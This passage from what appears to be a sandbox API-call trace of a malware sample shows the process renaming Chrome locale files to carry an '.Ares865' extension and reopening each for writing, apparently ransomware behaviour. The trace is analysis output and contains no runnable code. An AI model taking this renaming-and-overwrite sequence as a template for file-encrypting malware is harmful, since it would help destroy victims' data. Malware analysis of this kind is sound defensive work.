(x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\cs.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\cs.pak.ares865"), dwFlags=0x1) returned 1 [0142.981] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\cs.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0142.981] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=333833) returned 1 [0143.008] lstrcpyW (in: lpString1=0x2cce48e, lpString2="da.pak" | out: lpString1="da.pak") returned="da.pak" [0143.008] lstrlenW (lpString="da.pak") returned 6 [0143.008] lstrlenW (lpString="Ares865") returned 7 [0143.008] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak.Ares865") returned 85 [0143.008] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\da.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\da.pak.ares865"), dwFlags=0x1) returned 1 [0143.010] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\da.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.010] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=300280) returned 1 [0143.034] lstrcpyW (in: lpString1=0x2cce48e, lpString2="de.pak" | out: lpString1="de.pak") returned="de.pak" [0143.034] lstrlenW (lpString="de.pak") returned 6 [0143.034] lstrlenW (lpString="Ares865") returned 7 [0143.035] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak.Ares865") returned 85 [0143.035] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\de.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\de.pak.ares865"), dwFlags=0x1) returned 1 [0143.037] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\de.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.038] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=287740) returned 1 [0143.059] lstrcpyW (in: lpString1=0x2cce48e, lpString2="el.pak" | out: lpString1="el.pak") returned="el.pak" [0143.059] lstrlenW (lpString="el.pak") returned 6 [0143.059] lstrlenW (lpString="Ares865") returned 7 [0143.059] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak.Ares865") returned 85 [0143.059] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\el.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\el.pak.ares865"), dwFlags=0x1) returned 1 [0143.061] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\el.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.061] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=587796) returned 1 [0143.092] lstrcpyW (in: lpString1=0x2cce48e, lpString2="en-GB.pak" | out: lpString1="en-GB.pak") returned="en-GB.pak" [0143.092] lstrlenW (lpString="en-GB.pak") returned 9 [0143.092] lstrlenW (lpString="Ares865") returned 7 [0143.092] lstrcmpiW (lpString1="-GB.pak", lpString2="Ares865") returned 1 [0143.092] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak.Ares865") returned 88 [0143.092] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-gb.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-gb.pak.ares865"), dwFlags=0x1) returned 1 [0143.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-gb.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.095] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=271439) returned 1 [0143.116] lstrcpyW (in: lpString1=0x2cce48e, lpString2="en-US.pak" | out: lpString1="en-US.pak") returned="en-US.pak" [0143.116] lstrlenW (lpString="en-US.pak") returned 9 [0143.116] lstrlenW (lpString="Ares865") returned 7 [0143.116] lstrcmpiW (lpString1="-US.pak", lpString2="Ares865") returned 1 [0143.117] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak.Ares865") returned 88 [0143.117] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-us.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-us.pak.ares865"), dwFlags=0x1) returned 1 [0143.119] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-us.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.119] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=271426) returned 1 [0143.134] lstrcpyW (in: lpString1=0x2cce48e, lpString2="es-419.pak" | out: lpString1="es-419.pak") returned="es-419.pak" [0143.134] lstrlenW (lpString="es-419.pak") returned 10 [0143.134] lstrlenW (lpString="Ares865") returned 7 [0143.134] lstrcmpiW (lpString1="419.pak", lpString2="Ares865") returned -1 [0143.134] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak.Ares865") returned 89 [0143.134] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es-419.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es-419.pak.ares865"), dwFlags=0x1) returned 1 [0143.136] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es-419.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.136] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=326821) returned 1 [0143.159] lstrcpyW (in: lpString1=0x2cce48e, lpString2="es.pak" | out: lpString1="es.pak") returned="es.pak" [0143.159] lstrlenW (lpString="es.pak") returned 6 [0143.159] lstrlenW (lpString="Ares865") returned 7 [0143.160] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak.Ares865") returned 85 [0143.160] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es.pak.ares865"), dwFlags=0x1) returned 1 [0143.162] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.162] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=332472) returned 1 [0143.181] lstrcpyW (in: lpString1=0x2cce48e, lpString2="et.pak" | out: lpString1="et.pak") returned="et.pak" [0143.181] lstrlenW (lpString="et.pak") returned 6 [0143.181] lstrlenW (lpString="Ares865") returned 7 [0143.182] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak.Ares865") returned 85 [0143.182] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\et.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\et.pak.ares865"), dwFlags=0x1) returned 1 [0143.184] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\et.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.184] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=289262) returned 1 [0143.206] lstrcpyW (in: lpString1=0x2cce48e, lpString2="fa.pak" | out: lpString1="fa.pak") returned="fa.pak" [0143.206] lstrlenW (lpString="fa.pak") returned 6 [0143.206] lstrlenW (lpString="Ares865") returned 7 [0143.206] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak.Ares865") returned 85 [0143.206] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fa.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fa.pak.ares865"), dwFlags=0x1) returned 1 [0143.208] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fa.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.208] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=467590) returned 1 [0143.253] lstrcpyW (in: lpString1=0x2cce48e, lpString2="fi.pak" | out: lpString1="fi.pak") returned="fi.pak" [0143.253] lstrlenW (lpString="fi.pak") returned 6 [0143.253] lstrlenW (lpString="Ares865") returned 7 [0143.253] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak.Ares865") returned 85 [0143.253] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fi.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fi.pak.ares865"), dwFlags=0x1) returned 1 [0143.257] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fi.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.257] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=308910) returned 1 [0143.278] lstrcpyW (in: lpString1=0x2cce48e, lpString2="fil.pak" | out: lpString1="fil.pak") returned="fil.pak" [0143.278] lstrlenW (lpString="fil.pak") returned 7 [0143.279] lstrlenW (lpString="Ares865") returned 7 [0143.279] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak.Ares865") returned 86 [0143.279] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fil.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fil.pak.ares865"), dwFlags=0x1) returned 1 [0143.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fil.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.282] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=334857) returned 1 [0143.307] lstrcpyW (in: lpString1=0x2cce48e, lpString2="fr.pak" | out: lpString1="fr.pak") returned="fr.pak" [0143.308] lstrlenW (lpString="fr.pak") returned 6 [0143.308] lstrlenW (lpString="Ares865") returned 7 [0143.308] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak.Ares865") returned 85 [0143.308] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fr.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fr.pak.ares865"), dwFlags=0x1) returned 1 [0143.311] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fr.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.311] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=350828) returned 1 [0143.331] lstrcpyW (in: lpString1=0x2cce48e, lpString2="gu.pak" | out: lpString1="gu.pak") returned="gu.pak" [0143.332] lstrlenW (lpString="gu.pak") returned 6 [0143.332] lstrlenW (lpString="Ares865") returned 7 [0143.332] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak.Ares865") returned 85 [0143.332] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\gu.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\gu.pak.ares865"), dwFlags=0x1) returned 1 [0143.334] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\gu.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.334] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=651681) returned 1 [0143.377] lstrcpyW (in: lpString1=0x2cce48e, lpString2="he.pak" | out: lpString1="he.pak") returned="he.pak" [0143.377] lstrlenW (lpString="he.pak") returned 6 [0143.377] lstrlenW (lpString="Ares865") returned 7 [0143.377] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak.Ares865") returned 85 [0143.377] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\he.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\he.pak.ares865"), dwFlags=0x1) returned 1 [0143.380] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\he.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.380] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=384803) returned 1 [0143.407] lstrcpyW (in: lpString1=0x2cce48e, lpString2="hi.pak" | out: lpString1="hi.pak") returned="hi.pak" [0143.407] lstrlenW (lpString="hi.pak") returned 6 [0143.407] lstrlenW (lpString="Ares865") returned 7 [0143.408] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak.Ares865") returned 85 [0143.408] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hi.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hi.pak.ares865"), dwFlags=0x1) returned 1 [0143.410] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hi.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.410] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=668289) returned 1 [0143.452] lstrcpyW (in: lpString1=0x2cce48e, lpString2="hr.pak" | out: lpString1="hr.pak") returned="hr.pak" [0143.452] lstrlenW (lpString="hr.pak") returned 6 [0143.452] lstrlenW (lpString="Ares865") returned 7 [0143.453] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak.Ares865") returned 85 [0143.453] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hr.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hr.pak.ares865"), dwFlags=0x1) returned 1 [0143.454] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hr.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.455] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=310359) returned 1 [0143.477] lstrcpyW (in: lpString1=0x2cce48e, lpString2="hu.pak" | out: lpString1="hu.pak") returned="hu.pak" [0143.477] lstrlenW (lpString="hu.pak") returned 6 [0143.477] lstrlenW (lpString="Ares865") returned 7 [0143.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak.Ares865") returned 85 [0143.478] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hu.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hu.pak.ares865"), dwFlags=0x1) returned 1 [0143.479] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hu.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.479] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=346759) returned 1 [0143.501] lstrcpyW (in: lpString1=0x2cce48e, lpString2="id.pak" | out: lpString1="id.pak") returned="id.pak" [0143.501] lstrlenW (lpString="id.pak") returned 6 [0143.501] lstrlenW (lpString="Ares865") returned 7 [0143.501] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak.Ares865") returned 85 [0143.501] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\id.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\id.pak.ares865"), dwFlags=0x1) returned 1 [0143.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\id.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0143.504] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=294525) returned 1 [0143.535] lstrcpyW (in: lpString1=0x2cce48e, lpString2="it.pak" | out: lpString1="it.pak") returned="it.pak" [0143.535] lstrlenW (lpString="it.pak") returned 6 [0143.535] lstrlenW (lpString="Ares865") returned 7 [0143.536] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak.Ares865") returned 85 [0143.536] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\it.pak"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\it.pak.ares865"), dwFlags=0x1) returned 1 [0143.538] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak.Ares865" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\it.pak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, 